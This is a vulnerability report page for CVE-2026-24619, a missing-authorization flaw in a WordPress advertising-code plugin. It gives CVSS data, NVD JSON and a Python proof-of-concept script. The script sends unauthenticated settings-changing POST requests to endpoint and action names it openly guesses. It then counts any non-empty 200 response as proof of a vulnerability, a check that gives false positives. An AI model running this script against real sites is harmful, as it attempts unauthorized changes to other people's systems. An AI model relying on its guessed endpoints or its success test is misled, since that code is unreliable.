Security Vulnerability Report
中文
CVE-2026-24619 CVSS 5.3 MEDIUM

CVE-2026-24619

Published: 2026-01-23 15:16:21
Last Modified: 2026-04-28 15:16:20

Description

Missing Authorization vulnerability in PopCash PopCash.Net Code Integration Tool popcashnet-code-integration-tool allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PopCash.Net Code Integration Tool: from n/a through <= 1.8.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

PopCash.Net Code Integration Tool <= 1.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24619 PoC - Missing Authorization in PopCash.Net Code Integration Tool # Target: WordPress site with PopCash.Net Code Integration Tool plugin <= 1.8 import requests import sys def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2026-24619 Missing Authorization vulnerability in PopCash.Net Code Integration Tool """ # Common WordPress admin-ajax.php endpoint admin_ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Common plugin endpoints that might be affected potential_endpoints = [ f"{target_url}/wp-content/plugins/popcashnet-code-integration-tool/includes/ajax-handler.php", f"{target_url}/wp-content/plugins/popcashnet-code-integration-tool/admin/partials/settings.php", admin_ajax_url ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2026-24619 - Missing Authorization in PopCash.Net Code Integration Tool") print("-" * 60) for endpoint in potential_endpoints: print(f"\n[+] Testing endpoint: {endpoint}") # Try common vulnerable actions without authentication vulnerable_actions = [ {"action": "popcashnet_save_settings", "data": {"popcash_code": "test"}}, {"action": "popcashnet_get_config", "data": {}}, {"action": "popcashnet_update_options", "data": {"option_name": "popcash_settings"}}, {"action": "save_popcash_settings", "data": {"popcash_id": "123456"}} ] for payload in vulnerable_actions: try: response = requests.post( endpoint, data=payload, timeout=10, verify=False, allow_redirects=False ) # Check for successful response without auth if response.status_code == 200 and len(response.text) > 0: print(f"[!] Potential vulnerability found!") print(f" Action: {payload['action']}") print(f" Status: {response.status_code}") print(f" Response length: {len(response.text)}") print(f" Response preview: {response.text[:200]}") return True except requests.exceptions.RequestException as e: print(f" Error: {e}") continue print("\n[*] No obvious vulnerability detected") print("[*] Manual verification recommended") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-24619-poc.py <target_url>") print("Example: python cve-2026-24619-poc.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24619", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:20.890", "lastModified": "2026-04-28T15:16:20.033", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in PopCash PopCash.Net Code Integration Tool popcashnet-code-integration-tool allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PopCash.Net Code Integration Tool: from n/a through <= 1.8."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en PopCash PopCash.Net Code Integration Tool popcashnet-code-integration-tool permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a PopCash.Net Code Integration Tool: desde n/a hasta &lt;= 1.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/popcashnet-code-integration-tool/vulnerability/wordpress-popcash-net-code-integration-tool-plugin-1-8-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}